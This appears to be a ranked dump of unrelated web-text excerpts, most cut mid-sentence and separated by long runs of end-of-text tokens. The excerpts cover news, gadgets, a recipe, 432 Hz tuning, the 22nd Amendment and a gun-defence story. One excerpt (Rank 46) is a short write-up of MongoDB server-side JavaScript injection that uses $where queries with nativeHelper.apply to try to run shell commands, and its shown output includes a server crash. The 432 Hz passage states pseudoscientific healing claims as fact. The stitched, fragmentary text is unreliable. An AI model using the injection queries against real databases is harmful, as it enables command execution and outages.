Playoffs<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 39; Score = 512000.0 +<|begin_of_text|>Question: How many teachers still need to be hired at B.C. schools? + +a) A lot, considering students are already one month into the school year. + +b) Officially, 400, according to the number of postings on the B.C. Public School Employers’ website. + +c) Far more than that, given that some postings are for multiple specialist positions and on-call teachers. + +d) All of the above. + +The correct answer is d. And the reason is as complicated as the start of this school year has been. + +The Supreme Court of Canada ruling that reduced class sizes and required B.C. to hire 3,500 new teachers sparked unprecedented movement of teachers between education districts and a wave of new hires — which continues today. + +“It’s challenging to pinpoint exact numbers, because the posting process right now is very fluid,” said Janet Stewart, chief administrative officer of the Public School Employers’ Association. “It’s quite a bit of a domino effect. So, to be looking at the posting numbers tells a more complex story.” + +Stewart’s organization, which negotiates on behalf of school boards to get new teachers hired, said there are 400 postings for new teachers in B.C. right now. But each of those postings can represent multiple vacancies, and those vacancies can be for full-time, part-time or on-call work. + +ON-CALL TEACHERS IN HIGH DEMAND + +A Postmedia analysis of the postings on the website from early this week reveals vacancies for more than 900 full- or part-time jobs, in addition to 1,000 schools looking for on-call teachers. + +Stewart said some of those postings are technically filled because in some cases the temporary teacher currently in the classroom will be officially hired once the paperwork is completed. In other cases, the person temporarily filling the role doesn’t want the job permanently so new teachers still need to be found — often in specialist roles. + +Multiple school boards, including Burnaby, Coquitlam and the all-French Conseil Scolaire Francophone, have indicated multiple vacancies for bilingual teachers or librarians, which are always hard to find in B.C. + +“We definitely have higher volumes this year and we definitely have pressure points around those highly specialized positions in particular,” Stewart said. “I’m hopeful it will calm down (this month).” + +She also said that the data doesn’t mean 1,000 additional on-call teachers necessarily need to be hired in B.C., because schools share a pool of on-call teachers run by the district, and some work +================================================================================ +Rank = 40; Score = 505856.0 +<|begin_of_text|>it donated Rs 50 lakh + + +Naik’s now outlawed outfit + + +all premises of the NGO had been sealed in view of NIA raids + + +NEW DELHI: Controversial preacher Zakir Naik’s NGO Islamic Research Foundation (IRF) had allegedly offered a second donation of Rs 25 lakh to Rajiv Gandhi Charitable Trust (RGCT) in December 2011, months afterthat is already in the public realm.Documents seized during raids onshow that it had wanted the Rs 25 lakh donation to RGCT to be routed via Mumbai-based M H Saboo Siddique Maternity and General Hospital, but the hospital ended up utilizing the money itself after IRF kept vacillating on who should be the end beneficiary. Besides RGCT, it had also recommended Allahabad-based Kamla Nehru Memorial Hospital Society, and KARM, an NGO in Mumbai.Significantly, according to resolutions passed by IRF in June-July and November 2011, the two donations of Rs 50 lakh and Rs 25 lakh were extended to RGCT on the basis of applications received from the trust which has Congress president Sonia Gandhi and vice-president Rahul Gandhi on its board of trustees. This contrasts with Congress’s claim, made when the Rs 50 lakh donation became public, that it never solicited donation from IRF. RGCT did not respond to TOI’s queries based on the documents in its possession.When contacted, IRF spokesperson Arif Malik said that given that“IRF does not have access to its records and hence cannot check donations made in the past”.As per documents with TOI, in case of both the donations, applications were received from RGCT, New Delhi, and placed before IRF’s board of trustees.The papers show that IRF, at a meeting of its trustees in November 2011, passed a resolution stating that applications for medical and educational aid was received from M H Saboo Siddique Hospital, RGCT and Bandra Education Society.The meeting resolved to donate Rs 5 lakh to the hospital as medical aid and Rs 5 lakh to the society as educational aid. It “further resolved that Rs 30,00,000 be donated to M H Saboo Siddique... hospital out of which they should retain Rs 5,00,000 and further donate Rs 25,00,000 to RGCT.” According to the documents, Rs 30 lakh was given to the hospital vide cheque No.964635 dated December 19, 2011.While RGCT did not respond +================================================================================ +Rank = 41; Score = 497664.0 +<|begin_of_text|>Share + +As recent graduate Pieter Smakman explained in a guest post in Sparkisan, “body parts are still very hard to scan due to their agile nature.” Whereas static objects are relatively straightforward and simple, a human limb has many nuances that make them considerably more difficult to fully process and understand (from a machine’s point of view, that is). So to address this issue, Smakman “developed the first dedicated and low-cost 3D Hand Scanner.” + +With Raspberry Pis, laser pointers, and a total of 32 cameras, Smakman claims that his scanner “is able to create a precise surface model of the hand,” which in turn “opens a new world of possibilities: think of 3D printed braces, personalized medical instruments, and a long-awaited tool for everyone who designs products that interact with the human hand.” + +For now, this world is one that only exists in hypotheticals — Smakman’s design is one of a kind and has yet to be reproduced, much less made available to the general public. But if it ever does come to fruition, it’s sure to have a major impact on the way our hands (and the rest of our bodies) are able to interact with the world.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 42; Score = 495616.0 +<|begin_of_text|>Share + +So how big is it, exactly? Well, according to our best estimates, the supermassive black hole is roughly 21 billion times the size of the Sun, and its event horizon (an area so dense and powerful that light can’t escape its gravity) measures 130 billion kilometers in diameter. That’s about 15 times the diameter of Neptune’s orbit around the Sun, according to scientists at the Hubble Space Telescope. At one point, the black hole was fueling itself on a process called hot accretion. Space stuff like gases, dust, and galactic debris fell towards the black hole and created an accretion disk. Then that spinning disk of space junk, accelerated by the strong gravitational pull of the largest known black hole, emitted huge jets of energy out into the galaxy. + +During that active period, NGC 4889 would have classified as a quasar (quasi-stellar radio source) thanks to the black hole’s emissions of up to a thousand times more energy than our Milky Way galaxy. But the black hole is now in dormant mode because there isn’t any more sustenance stored in the orbiting accretion disk. “The accretion disk sustained the supermassive black hole’s appetite until the nearby supply of galactic material was exhausted. Now, napping quietly as it waits for its next celestial snack, the supermassive black hole is dormant”, says the Hubble Space Telescope website. + +Of course, the announcement posted with new photos of the NGC 4889 galaxy is quick to point out that the pictures don’t exactly capture the likeness of the supermassive black hole. It is impossible to observe a black hole directly, but scientists have been able to identify the implied presence of a black hole by analyzing the way celestial objects interact with some invisible force. For this particular black hole in the NGC 4889 galaxy, scientists used instruments on the Keck II Observatory and the Gemini North Telescope to measure the velocity of stars moving around the center point of the galaxy. The stars’ specific velocities re what allowed scientists to calculate the incredible size of NGC 4889’s black hole.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 43; Score = 493568.0 +<|begin_of_text|>0 + +From co-creators Ryan Murphy and Brad Falchuk, the FX series American Horror Story uses a unique and compelling approach to television, with a different setting, different characters and a rotating cast of actors for each season. For Season 3, American Horror Story: Coven has told the secret history of witches and witchcraft in America, with a cast of talented actresses that included Jessica Lange, Kathy Bates, Angela Bassett, Patti LuPone, Sarah Paulson, Frances Conroy, Lily Rabe, Taissa Farmiga, Emma Roberts, Gabourey Sidibe and even Stevie Nicks. + +During this exclusive phone interview with Collider, actress Angela Bassett talked about how she came to be a part of the show this season, how it was the best of all worlds, bringing the history of the real woman to her portrayal in the present day, talking to actual voodouns, how invaluable it was to really get to shoot in New Orleans, and that she would absolutely be willing to entertain the idea of returning to the series, for a future season. Check out what she had to say after the jump. + +Collider: How did you come to be a part of the show, this season? + +ANGELA BASSETT: My agent reached out to Ryan [Murphy] and said, “What about Angela, for American Horror Story?” And he was like, “Yes, because she’s who I’m thinking of for Marie Laveau.” So, they reached out to me and said that I should go in and take a meeting with him for the character. I didn’t know that I was his choice for that. I was familiar with the show, but I hadn’t watched it because I don’t really like horror shows, horror movies, or any of that. I’m really a lightweight, in terms of that. But, I watched both seasons before going in to meet him. And I’m definitely a fan of Marie Laveau and New Orleans. What I saw, in addition to the horror, was that the writing was so wonderful and the characters were so realized. It wasn’t just fright night, so I could appreciate that. So, I went in to meet him and he told me what he wanted to do. New Orleans is one of my favorite cities, and I knew something about the historical figure of Marie Laveau, so I was excited about that, and I think he could see that in me. I don’t think the country, as a whole, +================================================================================ +Rank = 44; Score = 487424.0 +<|begin_of_text|>Share + +Previous Next 1 of 3 + +Updated on 12-19-2014 by Andy Boxall: Added in details of the ZenWatch’s UK launch. + +November 9 U.S. release + +If you want to get your hands on the ZenWatch, Asus announced it will launch on November 9 at Best Buy. The Android Wear-powered smartwatch has also made its way to the Google Play Store, but regardless of where you buy it, the watch will cost you $200. There’s no word on whether other retailers, such as Amazon, will sell the ZenWatch, though its price point puts it on par with other Android Wear smartwatches. + +December 23 release in the UK + +The Asus ZenWatch will go on sale in the UK on December 23 for £200, or about $310, making it considerably more expensive than in America. According to Pocket-lint.com, the watch will be an exclusive to high street electronics retailers Currys and PC World. Online retailer Clove Technology has a holding page for the watch, suggesting it may not be exclusive for all that long. + +Asus’ smartwatch was originally slated to arrive in stores sometime between late summer and the end of 2014, so it’s arguably still on target. A rumor circulated at the beginning of October warned us the ZenWatch may be in very limited supply at first. + +Curved screen, smart looks + +The screen made from 2.5D curved glass and looks slightly oval in shape with its rounded edges. The AMOLED panel measures 1.63-inches and features a resolution of 320 x 320 pixels. Asus created many customizable watch faces for you to choose from, amounting to more than 100 combinations. + +The ZenWatch comes with a 1.2GHz Snapdragon 400 processor and 512MB of RAM. The watch has 4GB of internal storage, a 1.4Wh battery, Bluetooth 4.0, and is waterproof with an IP55 rating. The ZenWatch is, of course, powered by Android Wear and features what Asus calls “What’s Next” smart notifications. What’s Next is really just Google Now, but with a few added features. + +Asus added several cool functions to make the ZenWatch easier to use, including “Tap Tap,” a feature that asks your phone to ring so you can find it. All you have to do is tap twice on the screen. You can also cover the face of the ZenWatch when you need to mute phone +================================================================================ +Rank = 45; Score = 485376.0 +<|begin_of_text|>1 banana + +2 eggs + +What could be better then pancakes? 2 Ingredient Banana Pancakes. These 2 ingredient banana pancakes are so simple and delicious. You’ve probably seen this recipe floating around the internet for quite some time now, I figured I better jump on the pancake bandwagon. I’m glad I did, and you’ll be glad too! + +Directions for 2 Ingredient Banana Pancakes + +All you need to make these amazing, delicious pancakes is a very ripe banana and 2 eggs. Throw it all in a blender (minus the shells and peel of course) and give it a whiz. Cook your pancakes just like a regular pancake! When they start to bubble it’s time to flip them! + +The beautiful thing about these 2 ingredient banana pancakes is that they are so versatile. You can top them with butter and syrup, peanut butter, chocolate chips, berries – the pancakes are your oyster. Wait, gross. You know what I mean. + +I chose to top mine with banana coins and melted peanut butter. These pancakes taste so delicious it’s hard to believe they aren’t loaded with sugar. + +How about dem photography skills? I’m getting better! I finally discovered what those fancy symbols on my camera do. It’s a work in progress, but I absolutely love my camera. If anyone is interested I use this camera: Nikon D3100 14.2MP Digital SLR Camera with 18-55mm f/3.5-5.6 AF-S DX VR Nikkor Zoom Lens + +If you are banana lover make sure you check out my Blueberry Banana Smoothie Recipe as well! Thanks for reading! Make sure to let me know what you think of these amazing 2 ingredient banana pancakes! Have you tried them before? How did they turn out!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 46; Score = 485376.0 +<|begin_of_text|>Lucky discovery + +Trying some server side javascript injection in mongodb, I wondered if it would be possible to pop a shell. + +The run method seems good for this : + +> run("uname","-a") Sun Mar 24 07:09:49 shell: started program uname -a sh1838| Linux mongo 2.6.32-5-686 #1 SMP Sun Sep 23 09:49:36 UTC 2012 i686 GNU/Linux 0 + +Unfortunately, this command is only effective in mongo client : + +> db.my_collection.find({$where:"run('ls')"}) error: { "$err" : "error on invocation of $where function:nJS Error: ReferenceError: run is not defined nofile_a:0", "code" : 10071 } + +But let’s dig a little bit. + +> run function () { return nativeHelper.apply(run_, arguments); } + +So you can run the “run” function directly by calling nativeHelper.apply(run_,[“uname”,”-a”]); + +In server side, the result show us that nativeHelper.apply method exists! + +> db.my_collection.find({$where:'nativeHelper.apply(run_, ["uname","-a"]);'}) error: { "$err" : "error on invocation of $where function:nJS Error: ReferenceError: run_ is not defined nofile_a:0", "code" : 10071 } + +So what’s run_? + +So what's "run_" > run_ { "x" : 135246144 } + +An associative array, can we use it in server side? + +> db.my_collection.find({$where:'nativeHelper.apply({"x":135246144}, ["uname","-a"]);'}) Sun Mar 24 07:15:26 DBClientCursor::init call() failed Sun Mar 24 07:15:26 query failed : sthack.my_collection { $where: "nativeHelper.apply({"x":135246144}, ["uname","-a"]);" } to: 127.0.0.1:27017 Error: error doing query: failed Sun Mar 24 07:15:26 trying reconnect to 127.0.0.1:27017 Sun Mar 24 07:15:26 reconnect 127.0.0.1:27017 failed couldn't connect to server 127.0.0.1:27017 + +The server crashed o/! + +Let’s check the source code : + +./src/mongo/script +================================================================================ +Rank = 47; Score = 483328.0 +<|begin_of_text|>Share + +Previous Next 1 of 14 + +Sometimes a little information can go a long way. + +Something as simple as knowing when the stoplight coming up is going to change can have a profound effect on the way you choose to drive. If you know that you’re going to hit that red light no matter what you do, you might choose to ease up and just coast up to the light. Or if you know it’s about to go green, why slow down and then speed up again? That little bit of information can help smooth out your driving, and in the process, help smooth out traffic congestion as well. + +Audi recently became the first automaker to offer Traffic Light Information as a fully integrated feature available on selected new vehicles including Audi A4, Q7, and A4 Allroad models. Other automakers (notably BMW) work with smartphone apps that provide similar information, but Audi’s solution does not depend on a paired phone running an app. It’s native to the car’s driver information system. + +“The launch of this technology is another in a long list of firsts for Audi that have positioned us as the industry leader in connectivity solutions,” said Audi of America President Scott Keogh. “V2I applications and services like Traffic Light Information are essential components as we continue to move toward an autonomous future.” + +How it works + +The process of getting traffic light status info and predictions about light changes is fairly straightforward. The municipality where you’re driving shares its data with Audi, and Audi broadcasts the information to your car, where the data is compared with your car’s GPS data to determine which light you’re approaching. Then the car puts an icon and a counter up on the gauge pod driver information display, and into the head-up display projected onto the driver’s side of the windshield. The information displayed is simple: it shows a picture of a stoplight in its current state, red or green, plus a counter giving the system’s best prediction of when the light is likely to change. + +There’s a key word hidden in that last sentence, and it’s “prediction.” Because there are some variables that can’t be precisely predicted, such as emergency vehicles that have the ability to change or hold a light as they approach, sometimes the system does not have full confidence about when the light will change. In that case, the Audi will not display the counter for you. The driver still has to obey the light, no matter what the dashboard display might say. + +On the back end, things are more complicated. First of all, +================================================================================ +Rank = 48; Score = 483328.0 +<|begin_of_text|>What is 432 Hz tuning? + +A=432 Hz, known as Verdi’s ‘A’ is an alternative tuning that is mathematically consistent with the universe. Music based on 432Hz transmits beneficial healing energy, because it is a pure tone of math fundamental to nature. + +The universal music of sacred geometry + +According to Brian T. Collins, a musician and researcher, the standard pitch (A=440 Hz) does not harmonize on any level that corresponds to cosmic movement, rhythm, or natural vibration. The greatest musicians, such as Mozart and Verdi, based their music on the natural vibration of A=432. It’s true that it is only 8 vibrations per second different from the standard tuning, but this small difference seems to be remarkable to our human consciousness. + +There’s a growing musical and metaphysical movement for recovering optimal integrity in the music industry and spirituality through the 432Hz tuning. In April 2008 Dutch journalist Richard Huisken founded the ‘back to 432 Hz’ committee, claiming that this original tuning was used in ancient cultures and is found on antique instruments like the Stradivarius violin. + +The healing benefits + +According to Richard Huisken, music tuned to 432 Hz is softer and brighter, giving greater clarity and is easier on the ears. Many people experience more meditative and relaxing states of body and mind when listening to such music. The natural musical pitch of the universe gives a more harmonic and pleasant sound than 440 Hz. + +432 Hz seems to work at the heart chakra, “the feeling”, and therefore could have a good influence on the spiritual development of the listener. Some people who are not able to distinguish the 8hz difference claim they can feel the music warmer due to the longer wavelength. + +Listen to 432Hz and enjoy living in balance + +Because 432 Hz gives a greater clarity than 440 Hz, there’s less need to play it as loud as 440 Hz. This means less hearing damage, as long as you put the volume not too high. Furthermore there’s also less noise pressure. Researchers and musicians, such as Coreen Morsink (pianist and music teacher), report that they feel calmer, happier and more relaxed when playing music at 432Hz. + +Music based on this natural tone is more transparent, more marked, gives an obvious musical picture and the overtones and undertones moves more freely. Music based on 440 Hz represents stuffed emotions and blocked energy. By lowering the pitch by just 8 Hz, you +================================================================================ +Rank = 49; Score = 479232.0 +<|begin_of_text|>What is the 22nd Amendment? + +The 22nd Amendment to the United States Constitution sets term limits for the elected President of the United States. Passed by the United States Congress on March 21, 1947, the 22nd Amendment was later ratified by the requisite number of states on the 27th of February in 1951. + +The 22nd Amendment states that no personal shall be elected to the office of the President more than twice and no person who has already held office—or acted as the president of the United States—for more than two years of a term shall be elected President more than once. + +The primary motive of this amendment was to establish term limits; the 22nd Amendment to the United States Constitution states that no US President shall be elected to more than two terms. Furthermore, the 22nd Amendment limits the maximum time an individual may be serve as President to 10 years, if the person should succeed to the office. + +Original Text of the 22nd Amendment to the United States Constitution: + +Section 1. No person shall be elected to the office of the President more than twice, and no person who has held the office of President, or acted as President, for more than two years of a term to which some other person was elected President shall be elected to the office of the President more than once. But this article shall not apply to any person holding the office of President when this article was proposed by the Congress, and shall not prevent any person who may be holding the office of President, or acting as President, during the term within which this article becomes operative from holding the office of President or acting as President during the remainder of such term. + +Section 2. This article shall be inoperative unless it shall have been ratified as an amendment to the Constitution by the legislatures of three-fourths of the several States within seven years from the date of its submission to the States by the Congress. + +History of the 22nd Amendment: + +Historians cite George Washington’s unwillingness to seek office for a third term as evidence that the founding fathers saw the two-term limit as conventional. The constraint was instituted to impede the development of pseudo monarchy. + +In addition to Washington, Thomas Jefferson also contributed to the two-term limit by suggesting an office without restraints could yield a “a President for life”, which would obfuscate the premise of a democratic government. + +Comments + +comments<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 50; Score = 471040.0 +<|begin_of_text|>925.2k SHARES Facebook Twitter + +A 13-year-old boy fended off two hardened felons who were attempting to break into his house by using his mother’s gun to protect himself while home alone. + +The boy saw the men breaking into the back of his home, “at which time he feared for his safety,” and grabbed his mother’s gun, the document states. He began firing at them, and the Sheriff’s office reported that they returned fire. + +In a heated shootout, the boy shot Brown three times, and Bennett drove him to the hospital where he later died. The gray Chevy Sonic they were driving had bullet holes in it from the boy chasing them, the affidavit states. + +Where was the media coverage of this brave young man’s heroic act, how about a Tweet from President Obama commending his bravery. Without the protection of his mothers gun 